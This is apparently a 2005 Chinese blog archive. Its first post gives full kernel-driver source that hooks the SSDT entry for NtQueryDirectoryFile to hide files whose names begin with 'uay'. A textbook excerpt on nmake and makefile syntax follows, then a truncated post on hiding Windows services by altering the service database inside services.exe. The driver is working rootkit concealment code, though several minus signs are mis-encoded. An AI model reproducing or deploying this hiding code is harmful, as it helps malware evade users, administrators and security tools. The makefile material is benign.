2005年09月28日

没啥好说的,很简单:hook 系统服务 NtQueryDirectoryFile。

// Native directory-enumeration call (exported by ntoskrnl) that the driver hooks.
// Keep NTSYSAPI on this declaration: per the author's note below, without it the
// symbol resolves to a jmp thunk through the driver's own IAT, and the service
// index that DriverEntry reads from ZwQueryDirectoryFile+1 comes from the wrong bytes.
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      );
在声明要用到的函数时 NTSYSAPI 这个东西不能丢。如果没有这个,就会在文件的 IAT 中有这么一项,然后调用 ZwQueryDirectoryFile 的时候,地址就是 IAT 的地址,执行的是一个 jmp __imp__ZwQueryDirectoryFile,结果自然就和想的不一样了,应该注意。


////////////////////////hookservice.h///////////////////////
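// One system service table: ServiceTable[i] is the handler address for service
// index i. The offset comments describe a 0x10-byte layout (four 4-byte members
// on 32-bit), which is also the stride _SERVICE_DESCRIPTOR_TABLE below relies on.
typedef struct _SYSTEM_SERVICE_TABLE
{
 /*000*/ ULONG* ServiceTable;           // array of entry points
 /*004*/ LONG*  CounterTable;           // array of usage counters
 /*008*/ LONG   ServiceLimit;           // number of table entries
 /*00C*/ UCHAR* ArgumentTable;          // array of byte counts (was a bare UCHAR, a
                                        // 1-byte member that contradicts the /*010*/ end offset)
 /*010*/ }
 SYSTEM_SERVICE_TABLE,
  * PSYSTEM_SERVICE_TABLE,
  **PPSYSTEM_SERVICE_TABLE;
 
#define SYSTEM_SERVICE_TABLE_ \
 sizeof (SYSTEM_SERVICE_TABLE)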
//——————————————————————–
// Shape of the exported KeServiceDescriptorTable: four SYSTEM_SERVICE_TABLE slots
// at 0x10-byte steps. Only `ntoskrnl` (the native API table) is used in this driver.
typedef struct _SERVICE_DESCRIPTOR_TABLE
{
 /*000*/ SYSTEM_SERVICE_TABLE ntoskrnl;  // ntoskrnl.exe (native api)
 /*010*/ SYSTEM_SERVICE_TABLE win32k;    // win32k.sys   (gdi/user)
 /*020*/ SYSTEM_SERVICE_TABLE Table3;    // not used
 /*030*/ SYSTEM_SERVICE_TABLE Table4;    // not used
 /*040*/
}
 SERVICE_DESCRIPTOR_TABLE,
   * PSERVICE_DESCRIPTOR_TABLE,
   **PPSERVICE_DESCRIPTOR_TABLE;
  
#define SERVICE_DESCRIPTOR_TABLE_ \
        sizeof (SERVICE_DESCRIPTOR_TABLE)

// The ntoskrnl export holding the service tables; DriverEntry and DriverUnloAd
// write directly into KeServiceDescriptorTable->ntoskrnl.ServiceTable.
extern PSERVICE_DESCRIPTOR_TABLE KeServiceDescriptorTable;

//////////////////////////////////////////////////////////////////////
// Unload routine: puts the saved SSDT entry back (defined in hookservice.cpp).
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object);
// IRP_MJ_CREATE / IRP_MJ_CLOSE dispatch: completes every IRP with STATUS_SUCCESS.
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,
      IN PIRP Irp);
//——————————————————————–
/*
typedef enum _FILE_INFORMATION_CLASS {
  FileDirectoryInformation = 1, // 1 Y N D
  FileFullDirectoryInformation, // 2 Y N D
  FileBothDirectoryInformation, // 3 Y N D
  FileBasicInformation, // 4 Y Y F
  FileStandardInformation, // 5 Y N F
  FileInternalInformation, // 6 Y N F
  FileEaInformation, // 7 Y N F
  FileAccessInformation, // 8 Y N F
  FileNameInformation, // 9 Y N F
  FileRenameInformation, // 10 N Y F
  FileLinkInformation, // 11 N Y F
  FileNamesInformation, // 12 Y N D
  FileDispositionInformation, // 13 N Y F
  FilePositionInformation, // 14 Y Y F
  FileModeInformation = 16, // 16 Y Y F
  FileAlignmentInformation, // 17 Y N F
  FileAllInformation, // 18 Y N F
  FileAllocationInformation, // 19 N Y F
  FileEndOfFileInformation, // 20 N Y F
  FileAlternateNameInformation, // 21 Y N F
  FileStreamInformation, // 22 Y N F
  FilePipeInformation, // 23 Y Y F
  FilePipeLocalInformation, // 24 Y N F
  FilePipeRemoteInformation, // 25 Y Y F
  FileMailslotQueryInformation, // 26 Y N F
  FileMailslotSetInformation, // 27 N Y F
  FileCompressionInformation, // 28 Y N F
  FileObjectIdInformation, // 29 Y Y F
  FileCompletionInformation, // 30 N Y F
  FileMoveClusterInformation, // 31 N Y F
  FileQuotaInformation, // 32 Y Y F
  FileReparsePointInformation, // 33 Y N F
  FileNetworkOpenInformation, // 34 Y N F
  FileAttributeTagInformation, // 35 Y N F
  FileTrackingInformation // 36 N Y F
} FILE_INFORMATION_CLASS, *PFILE_INFORMATION_CLASS;
*/
//——————————————————————–
// Layout used to walk the FileBothDirectoryInformation buffer filled in by
// ZwQueryDirectoryFile: one variable-length entry per file, chained through
// NextEntryOffset, with 0 marking the last entry. myZwQueryDirectoryFile reads
// only NextEntryOffset and FileName.
typedef struct _FILE_BOTH_DIRECTORY_INFORMATION { // Information Class 3
 ULONG NextEntryOffset;      // byte distance to the next entry, 0 for the last one
 ULONG Unknown;              // FileIndex in the public FILE_BOTH_DIR_INFORMATION
 LARGE_INTEGER CreationTime;
 LARGE_INTEGER LastAccessTime;
 LARGE_INTEGER LastWriteTime;
 LARGE_INTEGER ChangeTime;
 LARGE_INTEGER EndOfFile;
 LARGE_INTEGER AllocationSize;
 ULONG FileAttributes;
 ULONG FileNameLength;       // length of FileName in bytes (not consulted by the hook)
 ULONG EaInformationLength;  // EaSize in the public definition
 UCHAR AlternateNameLength;  // ShortNameLength / ShortName in the public definition
 WCHAR AlternateName[12];
 WCHAR FileName[1];          // variable length; per the public definition not NUL-terminated
} FILE_BOTH_DIRECTORY_INFORMATION, *PFILE_BOTH_DIRECTORY_INFORMATION;
//——————————————————————–
// Native directory-enumeration call that the driver hooks. NTSYSAPI must stay on
// this declaration: without it the symbol resolves to a local jmp thunk through the
// IAT (see the author's note at the top), and the service index DriverEntry reads
// from ZwQueryDirectoryFile+1 would come from the thunk, not from the real stub.
NTSYSAPI
NTSTATUS
NTAPI
ZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      );
//——————————————————————–
// Function-pointer type with ZwQueryDirectoryFile's signature; used for
// pOldZwQueryDirectoryFile, the SSDT entry saved before it is overwritten.
typedef NTSTATUS (NTAPI *ZWQUERYDIRECTORYFILE)(
  IN HANDLE FileHandle,
  IN HANDLE Event OPTIONAL,
  IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
  IN PVOID ApcContext OPTIONAL,
  OUT PIO_STATUS_BLOCK IoStatusBlock,
  OUT PVOID FileInformation,
  IN ULONG FileInformationLength,
  IN FILE_INFORMATION_CLASS FileInformationClass,
  IN BOOLEAN ReturnSingleEntry,
  IN PUNICODE_STRING FileName OPTIONAL,
  IN BOOLEAN RestartScan
  );
//——————————————————————–
// Replacement routine written into the SSDT slot by DriverEntry. Same signature
// as ZwQueryDirectoryFile; forwards to the original and post-processes the
// FileBothDirectoryInformation buffer (defined in hookservice.cpp).
NTSTATUS
NTAPI
myZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      );
//——————————————————————–


//////////////////hookservice.cpp/////////////////////////////////////
#include <ntddk.h>
#include "hookservice.h"
// Original SSDT entry for ZwQueryDirectoryFile, saved by DriverEntry before the
// slot is overwritten. myZwQueryDirectoryFile forwards to it; DriverUnloAd
// writes it back. Not initialised until DriverEntry runs.
ZWQUERYDIRECTORYFILE pOldZwQueryDirectoryFile;

// Driver entry point: registers the create/close dispatch and the unload routine,
// then replaces the ntoskrnl SSDT entry for ZwQueryDirectoryFile with
// myZwQueryDirectoryFile. RegistryPath is not used. Always returns STATUS_SUCCESS.
//
// NOTE(review): after this returns, every NtQueryDirectoryFile call from any
// process passes through the hook; the slot now pointing outside the ntoskrnl
// image is the standard way such a hook is detected.
NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject,IN PUNICODE_STRING RegistryPath)
{
 DriverObject->MajorFunction[IRP_MJ_CREATE] =
 DriverObject->MajorFunction[IRP_MJ_CLOSE] = DriverDispAtch;
 DriverObject->DriverUnload = DriverUnloAd;

 // Service index: the DWORD at ZwQueryDirectoryFile+1 is used as the index into
 // ServiceTable. This assumes the Zw stub starts with a 5-byte "mov eax, imm32"
 // (32-bit x86 only) and that the symbol is the real stub, not an IAT thunk
 // (hence NTSYSAPI on the declaration). The entry found there is saved first.
 pOldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(KeServiceDescriptorTable->ntoskrnl.ServiceTable
         [*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1)]);

 // Clear CR0.WP so the read-only service table page can be written.
 // NOTE(review): CR0 and the interrupt flag are per-processor, so CLI here does
 // not serialize against other processors touching the table.
 _asm
 {
  CLI //disable interrupts (this processor only)
  MOV EAX, CR0 //move CR0 register into EAX
  AND EAX, NOT 10000H //disable WP bit
  MOV CR0, EAX //write register back
 }
 
 // Single 32-bit store of the hook address into the same slot read above.
 KeServiceDescriptorTable->ntoskrnl.ServiceTable
         [*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1)] = (ULONG)myZwQueryDirectoryFile;

 
 _asm
 {
  MOV EAX, CR0 //move CR0 register into EAX
  OR EAX, 10000H //enable WP bit
  MOV CR0, EAX //write register back
  STI //enable interrupts
 }

 
 
 return STATUS_SUCCESS;
}
//——————————————————————–
// Dispatch routine for IRP_MJ_CREATE and IRP_MJ_CLOSE: every request is completed
// successfully with no priority boost. DeviceObject is not used.
NTSTATUS DriverDispAtch(IN PDEVICE_OBJECT DeviceObject,
      IN PIRP Irp)
{
 const NTSTATUS status = STATUS_SUCCESS;
 (void)DeviceObject;

 Irp->IoStatus.Status = status;
 IoCompleteRequest(Irp, IO_NO_INCREMENT);
 return status;
}
//——————————————————————–
// Unload routine: writes the saved original entry back into the SSDT slot, using
// the same CR0.WP / CLI sequence as DriverEntry. Driver_object is not used.
// NOTE(review): nothing here waits for calls still executing inside
// myZwQueryDirectoryFile; a thread in the hook when the image is unmapped
// would presumably fault.
void DriverUnloAd(IN PDRIVER_OBJECT Driver_object)
{
 _asm
 {
  CLI //disable interrupts (this processor only)
  MOV EAX, CR0 //move CR0 register into EAX
  AND EAX, NOT 10000H //disable WP bit
  MOV CR0, EAX //write register back
 }
 
 // Same slot index computation as DriverEntry (DWORD at ZwQueryDirectoryFile+1).
 KeServiceDescriptorTable->ntoskrnl.ServiceTable
         [*(PULONG)((PUCHAR)ZwQueryDirectoryFile+1)] = (ULONG)pOldZwQueryDirectoryFile;
 _asm
 {
  MOV EAX, CR0 //move CR0 register into EAX
  OR EAX, 10000H //enable WP bit
  MOV CR0, EAX //write register back
  STI //enable interrupts
 }
}
//——————————————————————–
// SSDT replacement for ZwQueryDirectoryFile. Forwards every call unchanged to the
// saved original (pOldZwQueryDirectoryFile); then, only when
// FileInformationClass == FileBothDirectoryInformation and the result is
// STATUS_SUCCESS, removes from the returned buffer each entry whose name begins
// with "uay" (case-sensitive, first three WCHARs) by shifting the following
// entries down over it. Returns the original call's status in every case.
//
// Parameters are exactly those of ZwQueryDirectoryFile; FileInformation and
// FileInformationLength are the caller's output buffer and its size in bytes.
//
// NOTE(review): the DbgPrint calls fire on every invocation and on every removed
// entry, so the hook announces itself to any kernel debugger / DbgView reader;
// the SSDT slot pointing outside ntoskrnl is the other standard tell.
// FileInformation is presumably a user-mode buffer for user-mode callers and is
// dereferenced below without probing or an exception handler.
NTSTATUS
NTAPI
myZwQueryDirectoryFile(
      IN HANDLE FileHandle,
      IN HANDLE Event OPTIONAL,
      IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
      IN PVOID ApcContext OPTIONAL,
      OUT PIO_STATUS_BLOCK IoStatusBlock,
      OUT PVOID FileInformation,
      IN ULONG FileInformationLength,
      IN FILE_INFORMATION_CLASS FileInformationClass,
      IN BOOLEAN ReturnSingleEntry,
      IN PUNICODE_STRING FileName OPTIONAL,
      IN BOOLEAN RestartScan
      )
{
 NTSTATUS dwStAtus;
 PFILE_BOTH_DIRECTORY_INFORMATION lpInfo;
 /*if (FileInformationClass == FileBothDirectoryInformation){
  return STATUS_NO_SUCH_FILE;
 }*/ // (author's note: cannot simply do this)

 DbgPrint("i’m here :>\n");   // unconditional trace on every call
 dwStAtus = pOldZwQueryDirectoryFile(
  FileHandle,
  Event,
  ApcRoutine,
  ApcContext ,
  IoStatusBlock,
  FileInformation,
  FileInformationLength,
  FileInformationClass,
  ReturnSingleEntry,
  FileName,
  RestartScan
  );
 
 if (FileInformationClass == FileBothDirectoryInformation){
  if (dwStAtus == STATUS_SUCCESS){
    lpInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)FileInformation;
   //DbgPrint("%S\n",lpInfo->FileName);
   
   // First entry. RtlCompareMemory returns the number of matching bytes, so
   // == 6 means the first three WCHARs equal L"uay" (a prefix match).
   // FileNameLength is not consulted. This block duplicates the first iteration
   // of the do/while below.
   if (RtlCompareMemory(lpInfo->FileName,L"uay",6) == 6){
    DbgPrint("Blocked file: %S\n",lpInfo->FileName);//debug: %S relies on a terminator FileName is not guaranteed to have
    if ((ULONG)(lpInfo->NextEntryOffset) != 0){
     // Drop this entry by copying everything after it down over it. The moved
     // entries keep their own NextEntryOffset values, so the chain stays valid.
     // The copy length is derived from the buffer size FileInformationLength;
     // the `–` below reads as a mis-encoded `-`.
     FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
     RtlCopyMemory(lpInfo,(PFILE_BOTH_DIRECTORY_INFORMATION)((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset)),FileInformationLength – (((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset))-(ULONG)FileInformation));
    }
    else{
     // Last (or only) entry: nothing follows to shift in. NextEntryOffset is 0
     // here, so the subtraction is a no-op; the buffer is returned as is.
     FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
     return dwStAtus;
    }
    //return STATUS_NO_SUCH_FILE;
   }
   // Walk the chain. After a shift, `continue` jumps to the while test and the
   // same position is examined again; otherwise advance by NextEntryOffset.
   // Stops at the entry whose NextEntryOffset is 0.
   do{
    if (RtlCompareMemory(lpInfo->FileName,L"uay",6) == 6){
     DbgPrint("Blocked file: %S\n",lpInfo->FileName);
     if ((ULONG)(lpInfo->NextEntryOffset) != 0){
      // Same shift-down as above (same mis-encoded `–`).
      FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);
      RtlCopyMemory(lpInfo,(PFILE_BOTH_DIRECTORY_INFORMATION)((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset)),FileInformationLength – (((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset))-(ULONG)FileInformation));
     }
     else{
      FileInformationLength -= (ULONG)(lpInfo->NextEntryOffset);   // no-op: offset is 0
      break;
     }
     continue;
     //return STATUS_NO_SUCH_FILE;
    }
    //DbgPrint("%S\n",lpInfo->FileName);
    if (lpInfo->NextEntryOffset != 0){
     lpInfo = (PFILE_BOTH_DIRECTORY_INFORMATION)((ULONG)lpInfo + (ULONG)(lpInfo->NextEntryOffset));
    }
    
    
   }while (lpInfo->NextEntryOffset != 0);
  }
 }


 return dwStAtus;

}
//——————————————————————–

2005年09月26日

2.4.1 make 工具是什么
在DOS 时期编写汇编程序的时候,编译器和链接器基本上不用什么参数,命令只有区
区两条:
Masm xxx.asm;
Link xxx.obj;
只要做个批处理把xxx 换成%1,然后在命令行键入asm.bat xxx 就万事大吉了,很是方
便。Win32 编程就不一样了,不管编译器还是链接器都需要加上必要的选项,文件列表也多
了起来,如链接器的命令行参数中要列出obj,lib,res 和def 等多种文件,又多了资源编译
这一步,如果用批处理实现,要加的参数太多太乱,而每次用手工一行行地键入命令的话,
那对程序员来说简直就是一场灾难。当然,一种简单的解决办法就是为每个编程项目单独建
立一个批处理,每次改动后,运行批处理把所有模块重新编译一次,但是当程序很庞大的时

候,这将花费很长时间,那么该如何处理呢?这时候就要用到make 工具来维护代码了,从
网上下载Win32 汇编的例子程序时,常常发现除了*.asm 和*.rc 文件外,例子文件包中常常
还有一个makefile 文件,这就是给make 工具用的。
make 工具可以看成是一个智能的批处理工具,它本身并没有编译和链接的功能,同样是
用类似于批处理的方式——通过调用用户指定的语句来进行编译和链接。但是,批处理会执
行全部命令将全部源文件编译,包括那些不必重新编译的源文件,而make 工具则可根据目
标文件上一次编译的时间和所依赖的源文件的更新时间自动判断应当编译哪些源文件,对没
有更新过的文件不会处理,这样就可以大大提高程序调试的效率。
举例说明,我们要写一个test.exe 文件,生成最后的可执行文件有4 个步骤:
1. 汇编源文件x.asm,其中用到头文件common.inc,它们经Ml.exe 编译成x.obj;
2. 汇编源文件y.asm,用到头文件common.inc 和y.inc,它们经Ml.exe 编译成y.obj;
3. 资源脚本文件x.rc,经Rc.exe 编译成x.res;
4. 最后用Link 将x.obj,y.obj 和x.res 链接成test.exe。
可以看出,当程序调试的时候,如果修改了x.asm,也就是说x.obj 的文件时间比x.asm
要早,就需要重新进行步骤1 和4;如果修改了y.asm 或y.inc,那么需要重新执行步骤2 和4;
如果修改的是x.rc,则步骤3 和4 必须重新执行;如果修改的是common.inc,因为x.asm 和
y.asm 都和它有关,所以步骤1、2 和4 都要重新执行;如果同时修改了common.inc 和x.rc,
那么必须重复全部步骤。在这个例子中,文件的依赖关系就是:
1. test.exe 依赖于 x.obj,y.obj 和 x.res;
2. x.res 依赖于 x.rc;
3. x.obj 依赖于 x.asm 和 common.inc;
4. y.obj 依赖于 y.asm,common.inc 和 y.inc。
make 可以根据文件的时间正确判断文件的新旧并执行相应的步骤。但make 又是如何知
道文件之间的依赖关系呢?这需要用户用一个描述文件来指定。前面提到的makefile 就是这
个描述文件,执行make 工具的时候,它会默认用makefile 做描述文件名来进行相应的工作,
书写描述文件有规定的语法,虽然语法不是很简单,但写好以后就省事多了。
Microsoft 的make 工具文件名为nmake.exe,它并不是MASM 软件包的一部分,但可以
在Visual C++的Bin 目录下找到。Borland 公司的make 工具文件名是make.exe,它已经包括
在TASM 5.0 工具包中。两者默认的描述文件名都是makefile,描述文件的语法也大同小异,
只是使用时命令行参数有些不同。
2.4.2 nmake 的用法
在命令行键入nmake /? 可以显示帮助信息,nmake 的语法为:
nmake [选项] [/f 描述文件名] [/x 输出信息文件名] [宏定义] [目标]
说明如下:
/f 参数——如果描述文件名不使用默认的 makefile,可以用/f 参数指定。
/x 参数——如果想把屏幕输出的信息存到一个文件中,可以用/x 参数指定(用 DOS
下的管道操作符nmake > 文件名的方法无效)。
宏定义 可以用新的定义覆盖描述文件中的宏定义。

目标——指定建立描述文件中描述的某个文件,如上面的例子中默认是生成最后的
test.exe 文件,也可以用nmake x.res 指定更新x.res 文件。
nmake 常用的选项如表2.8 所示。
表2.8 nmake 的常用选项
选 项 简 介
/A 不检测文件时间,强制更新所有文件
/B 文件时间相等时也要更新文件
/D make 时显示文件新旧信息
/N 显示make 时要执行的命令,但并不真正执行
/P 一个比较有用的选择,make 时显示详细的信息
由于nmake 的应用是基于文件时间的,当计算机的时钟不准确或文件拷贝到另一台计算
机后文件时间有些偏差,那么可能文件的更新会不正确,这时最好用/A 选项强制把所有文件
更新一遍。在平时使用的时候,以makefile 当做建立的描述文件名,那么仅键入不加参数的
nmake 命令就可以完成所有工作了。
2.4.3 描述文件的语法
make 工具最主要也是最基本的功能就是通过描述文件来描述源程序之间的相互关系并
自动维护编译工作,而描述文件需要按照某种语法进行编写,文件中需要说明如何编译各个
源文件并链接生成可执行文件,并要求定义源文件之间的依赖关系,为了更方便使用,文件
中同时可以用一些宏定义。描述文件一般需要包含以下内容:
● 注释
● 宏定义
● 显式规则
● 隐含规则
在这里,首先为2.4.1 节中有关test.exe 的例子写出一个描述文件,再逐步介绍各部分的
书写语法。为了方便使用,一般都把描述文件的文件名取为默认文件名:makefile。这个例子
的makefile 文件如下(注意前面括号里的是行号,不是文件的真正内容):
(001) # nmake 工具的描述文件例子
(002) EXE = Test.exe #指定输出文件
(003) OBJS = x.obj \
(004) y.obj #需要的目标文件
(005) RES = x.res #需要的资源文件
(006)
(007) LINK_FLAG = /subsystem:windows #链接选项
(008) ML_FLAG = /c /coff #编译选项
(009)
(010) #定义依赖关系和执行命令
(011) $(EXE): $(OBJS) $(RES)
(012) Link $(LINK_FLAG) /out:$(EXE) $(OBJS) $(RES)

(013) $(OBJS): Common.inc
(014) y.obj: y.inc
(015)
(016) #定义汇编编译和资源编译的默认规则
(017) .asm.obj:
(018) ml $(ML_FLAG) $<
(019) .rc.res:
(020) rc $<
(021)
(022) #清除临时文件
(023) clean:
(024) del *.obj
(025) del *.res
1. 注释和换行
makefile 中的注释是以#号开头一直到行尾的字符,当nmake 工具处理到这些字符的时
候,它会完全忽略#号及全部注释字符。
当一行的内容过长的时候,可以用换行符来继续,makefile 的换行符是\,如例子中的第
三行和第四行可以合并为:
OBJS = x.obj y.obj #需要的目标文件
在使用换行符的时候要注意在“\”后面不能再加上其他字符,包括注释和空格,否则
nmake 检测到“\”不在一行的最后,就不会把它当成换行符解释,就会出现错误。
2. 宏定义
makefile 中允许使用简单的宏定义指代源文件及其相关编译信息,可以把宏称为变量,
在整个描述文件中,只要符合下面语法的行就是宏定义:
变量名=变量内容
如上面例子文件中的2 到8 就是宏定义,在引用宏时只需在变量前加$符号,但是要注意
的是,如果变量名的长度超过一个字符,在引用时就必须加圆括号(),下面都是有效的宏引
用:
$(LINK_FLAG)
$(EXE)
$A
$(A)
其中最后两个引用是完全一致的。
宏定义的使用可以使makefile 的使用更灵活:首先可以使文件便于修改,比如把第8 行
和第18 行中ml 的选项部分写成宏定义,以后要改变编译选项的时候,只要直接在makefile
文件头部改变宏定义就可以了,不必重新阅读整个makefile 文件;其次,当不止一个地方用到

同一个文件的时候,把文件名定义为宏定义可以减少错误,增加可读性,同时也可以便于
修改;最大的好处是可以直接在命令行中用新的宏定义覆盖,比如在命令行中键入:
nmake ML_FLAG="/c /coff /Fl"
那么这时就会以新的/c /coff /Fl 定义代替makefile 中定义的/c /coff,在这种使用中要注意
两个问题,一是宏名称要区分大小写,ML_FLAG 和ml_flag 是不一样的;二是定义值中有空
格的时候要用双引号引起来,没有空格时可以不用双引号,如ML_FLAG=/c,这使临时使用
不同的参数编译文件时可以不必修改makefile。
3. 显式规则
makefile 中包含有一些规则,这些规则定义了文件之间的依赖关系和产生命令,一个规
则的格式是这样的:
目标文件:依赖文件;命令 (方法1)

目标文件:依赖文件 (方法2)
命令
在规则定义和命令行中,不能包含注释,例子中的第11 和12 行把宏定义展开后就是:
test.exe:x.obj y.obj x.res
Link /subsystem:windows /out:test.exe x.obj y.obj x.res
这里的目标文件就是test.exe,它依赖于3 个文件x.obj,y.obj 和x.res,如果有必要,产
生目标文件的命令就是下面的Link 命令,整个规则可以用两种方法,用第二种方法的时候,
命令可以从第二行开始,第一行的“;”省略,但是这时命令前面必须有一个Tab 字符,否则
nmake 无法区分这究竟是命令还是别的定义。目标文件可以有多个,依赖文件也可以有多个,
同时命令也可以由多个命令行组成,当然这时候就必须用第二种方法定义了。
我们也可以用test.exe 生成的规则定义其他文件,如x.obj 或x.res 的生成方法,但nmake
如何知道哪个是最终要make 的文件呢?实际上nmake 默认将整个描述文件的第一条规则中
的目标文件认为是最终文件,如果我们把11,12 行放到第13 行后面,那么x.obj 和y.obj 的
建立规则就成了第一条规则,nmake 建立了x.obj 和y.obj 之后就不理会test.exe 的建立了,所
以我们必须把最终需要生成的文件放在第一条规则定义。当然,在nmake 的命令行参数中可
以指定要make 的目标,如我们要生成x.res 文件,那么不必修改makefile 将x.res 的描述规则
移动到最前面,而是直接在命令行键入以下命令即可:
nmake x.res
参数中也可以同时带好几个目标文件名,nmake 会一一处理,如果指定的目标文件没有
对应的规则,nmake 会返回一个出错信息:
fatal error U1073: don't know how to make 'xxx 文件'
当用户要求nmake 去建造一个目标时,make 会去找到这个目标的依赖规则,这时第二
行中的命令并不会立刻就执行,而是首先要做一些事情:nmake 先去检查依赖文件是否是

另一条规则的目标文件,如果是则先处理这一条规则;如果不是,nmake 再检查各个依赖
文件的时间,看这些文件有没有比目标文件更新的,如果没有,nmake 会决定不再重新建
造目标文件,并给出提示:'xxx 文件' is up-to-date,如果依赖文件有比目标文件更新的,才
执行命令。
所以一个顺序下来,所有的目标文件以及它们的依赖文件,以及依赖文件的依赖文件都
会被检查并更新,总而言之,一个目标文件的建立包含了顺序正确的指令链接,这个链接结
构是树状的,目标文件是根,一级级扩展到多个文件,我们要求的是nmake 去建立链接中处
于根部的那个文件,nmake 会根据链接结构从目标开始向初始状态前进,最后慢慢回来,在
这个过程中执行建立每个文件所必须的命令,一直到最终目标建立完成。
目标也可以没有依赖文件,而且目标也可以不是一个真正存在的文件,如例子第23 行到
第25 行中的clean 是一个目标,但我们并不是要生成一个clean 文件,而是希望在文件调试
完毕后用nmake 来清除临时文件,当我们键入nmake clean 的时候,工作目录下并没有clean
这个文件,那么nmake 就会去执行clean 定义中的命令,因为nmake 把每一个不存在的目标
当做是一个过时的目标,如此一来,就会删除中间过程中的文件*.obj 和*.res。
指出了目标文件全名的规则称为显式规则,但有些类别的文件的编译方法可以是雷同
的,如从asm 文件产生obj 文件的命令总是用ml,从rc 文件产生res 文件的命令总是用rc,
对于每个文件都写一条规则有些多余,这时候就要用到隐含规则。
4. 隐含规则
隐含规则可以为某一类的文件指出建立的命令,它具体定义了如何将带一个特定扩展名
的文件转换成具有另一种扩展名的文件,定义的格式是:
.源扩展名.目标扩展名:;命令 (方法1)

.源扩展名.目标扩展名: (方法2)
命令
隐含规则的语法和显式规则相似,也是用“:”隔开,在“;”下面书写命令,也可以不
用“;”而将命令写在第二行,同理,这时命令之前要加一个Tab 字符。
隐含规则不能有依赖文件,所以“:”下面没有内容,例子中的第17、18 行定义了从asm
文件建立obj 文件的隐含规则,第19 和20 行定义了从rc 文件建立res 文件的隐含规则,隐
含规则中无法指定确定的输入文件名,因为输入文件名是泛指的有相同扩展名的一整类文
件,这时候就要用到几个特殊的内定宏来指定文件名,这些宏是$@,$*,$?和$<,它们的含
义如下:
$@ —— 全路径的目标文件。
$* —— 除去扩展名的全路径的目标文件。
$? —— 所有源文件名。
$< —— 源文件名(只能用在隐含规则中)。
所以第19、20 行中的rc $< 用于x.rc 的时候就是rc x.rc。
读者可以注意到一些显式规则没有命令行,如第13 行的“$(OBJS): Common.inc”指出
了所有的obj 文件全部依赖于Common.inc 文件,第14 行的“y.obj: y.inc”则指出了y.obj 同

时也依赖于y.inc 和第13 行的规则合并,y.obj 依赖于Common.inc 也依赖于y.inc,但是这两
条规则都没有指出产生这些obj 文件的命令,所以nmake 处理的时候会到隐含规则中去找命
令行,最后会用第18 行的“ml $(ML_FLAG) $<”命令去产生这些obj 文件。

2005年09月23日

已经是23日了,,,
 不能片刻停留,草草的记到blog上
9月16-17是让我难忘记的日子,,,,,,,,,失去了我的最亲密的伙伴

管理工具中的"服务"里可以查看到服务,hook 了 ZwOpenKey 也不能阻止显示出服务来,只能是让对服务不能操作,但达不到隐藏的效果。后来在国外的一篇文章上看到说是在 services.exe 中有个 service 的 dAtAbAse,结构在 nt4 下找到的是
//================
// SERVICE_RECORD
//================
// Dependency information:
//    StartDepend is a linked list of services and groups that must be
//        started first before this service can start.
//    StopDepend is a linked list of services and groups that must be
//        stopped first before this service can stop.
//    Dependencies is a string read in from the registry.  Deleted when
//      the info has been converted to a StartDepend list.
//
// BUGBUG: Security descriptor is temporarily stored here until
// we are able to write it to the registry
//
// StartError:
// Error encountered by service controller when starting a service.
// This is distinguished from error posted by the service itself in
// the exitcode field.
//
// StartState:
// SC managed service state which is distinguished from the service
// current state to enable correct handling of start dependencies.
//
// Load order group information:
//
//     MemberOfGroup is a pointer to a load order group which this service
//         is currently a member of.  This value is set to NULL if this
//         service does not belong to a group.  A non-NULL pointer could
//         point to a group entry in either the order group or standalone
//         group list.
//
//     RegistryGroup is a pointer to a group which we have recorded in the
//         registry as the group this service belongs to.  This is not the
//         same as MemberOfGroup whenever the service is running and the
//         load order group of the service has been changed
//
// NT4-era services.exe record as quoted by the author. The injected DLL below
// relies only on the first four members (Prev, Next, ServiceName, DisplayName);
// everything after them is shown for context and is not touched.
typedef struct _SERVICE_RECORD {
    struct _SERVICE_RECORD  *Prev;          // linked list
    struct _SERVICE_RECORD  *Next;          // linked list
    LPWSTR                  ServiceName;    // points to service name
    LPWSTR                  DisplayName;    // points to display name
    DWORD                   ResumeNum;      // Ordered number for this rec
    DWORD                   ServerAnnounce; // Server announcement bit flags
    DWORD                   Signature;      // Identifies this as a service record.
